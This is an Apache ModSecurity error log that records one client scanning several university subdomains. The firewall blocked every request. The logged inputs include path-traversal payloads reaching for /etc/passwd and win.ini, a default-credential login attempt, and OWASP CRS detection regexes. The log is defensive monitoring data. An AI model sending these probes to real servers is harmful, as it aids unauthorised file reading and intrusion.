[Tue Aug 29 11:44:47.735789 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:,.*?[)\\\\da-f\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98][\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98](?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98].*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|\\\\Z|[^\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]+))|(?:\\\\Wselect.+\\\\W*?from)|((? ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "209"] [id "981257"] [msg "Detects MySQL comment-/space-obfuscated injections and backtick termination"] [data "Matched Data: ,\\x22password\\x22: found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAhISOIAAAAH"]
[Tue Aug 29 11:44:47.783572 2023] [:error] [pid 2110] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: \\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13v8Co-f0AAAg@AAoAAAAQ"]
[Tue Aug 29 11:44:48.412938 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfkzDQAAAAi"]
[Tue Aug 29 11:44:48.413042 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfiYq8AAAAg"]
[Tue Aug 29 11:44:48.416172 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAe3@GkAAAAA"]
[Tue Aug 29 11:44:48.416349 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAdQ3tsAAAAV"]
[Tue Aug 29 11:44:48.428095 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAg-pKgAAAAR"]
[Tue Aug 29 11:44:48.429651 2023] [:error] [pid 2029] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:in\\\\s*?\\\\(+\\\\s*?select)|(?:(?:n?and|x?x?or|div|like|between|and|not |\\\\|\\\\||\\\\&\\\\&)\\\\s+[\\\\s\\\\w+]+(?:regexp\\\\s*?\\\\(|sounds\\\\s+like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]|[=\\\\d]+x))|([\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?\\\\d\\\\s*?(?:--|#)) ..." at ARGS_NAMES:{"username":"admin","password":"public"}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "239"] [id "981246"] [msg "Detects basic SQL authentication bypass attempts 3/3"] [data "Matched Data: \\x22username\\x22:\\x22 found within ARGS_NAMES:{\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}: {\\x22username\\x22:\\x22admin\\x22,\\x22password\\x22:\\x22public\\x22}"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "www.unla.ac.id"] [uri "/api/v4/auth"] [unique_id "ZO13wMCo-f0AAAftVHoAAAAf"]
[Tue Aug 29 11:44:48.437098 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAdQ3twAAAAV"]
[Tue Aug 29 11:44:48.439152 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAgzyQUAAAAF"]
[Tue Aug 29 11:44:48.439370 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfkzDUAAAAi"]
[Tue Aug 29 11:44:48.443219 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAfEBzEAAAAO"]
[Tue Aug 29 11:44:48.447168 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAg-pKkAAAAR"]
[Tue Aug 29 11:44:48.463084 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13wMCo-f0AAAfEBzIAAAAO"]
[Tue Aug 29 11:44:48.475985 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wMCo-f0AAAdOefQAAAAS"]
[Tue Aug 29 11:44:48.489472 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfcoUoAAAAa"]
[Tue Aug 29 11:44:49.369751 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/spreadsheet-reader/test.php"] [unique_id "ZO13wcCo-f0AAAfcoUsAAAAa"]
[Tue Aug 29 11:44:49.392943 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfZj8kAAAAN"]
[Tue Aug 29 11:44:49.393761 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wcCo-f0AAAfcoUwAAAAa"]
[Tue Aug 29 11:44:49.394986 2023] [:error] [pid 2011] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wcCo-f0AAAfbktkAAAAZ"]
[Tue Aug 29 11:44:49.420990 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfiYrUAAAAg"]
[Tue Aug 29 11:44:49.421170 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAfZj8oAAAAN"]
[Tue Aug 29 11:44:49.425592 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAARphG8AAAAU"]
[Tue Aug 29 11:44:50.363065 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfg73YAAAAe"]
[Tue Aug 29 11:44:50.389293 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfkzDsAAAAi"]
[Tue Aug 29 11:44:50.406896 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfEBzUAAAAO"]
[Tue Aug 29 11:44:50.462361 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:File. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:File: ../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/nuovo/spreadsheet-reader/test.php"] [unique_id "ZO13wsCo-f0AAAc4E1QAAAAP"]
[Tue Aug 29 11:44:51.396809 2023] [:error] [pid 2012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAfcoVQAAAAa"]
[Tue Aug 29 11:44:51.436139 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAc4E1kAAAAP"]
[Tue Aug 29 11:44:51.441305 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAhMtUMAAAAM"]
[Tue Aug 29 11:44:51.476717 2023] [:error] [pid 1848] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAc4E1oAAAAP"]
[Tue Aug 29 11:44:51.499571 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAARphHgAAAAU"]
[Tue Aug 29 11:44:52.395693 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13xMCo-f0AAAdQ3uMAAAAV"]
[Tue Aug 29 11:44:52.501393 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO13xMCo-f0AAAhISPEAAAAH"]
[Tue Aug 29 11:44:53.400278 2023] [:error] [pid 2009] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAfZj9oAAAAN"]
[Tue Aug 29 11:44:53.409124 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAe3@HIAAAAA"]
[Tue Aug 29 11:44:53.410309 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAhISPQAAAAH"]
[Tue Aug 29 11:44:53.412353 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAARphH0AAAAU"]
[Tue Aug 29 11:44:53.479813 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAARphIAAAAAU"]
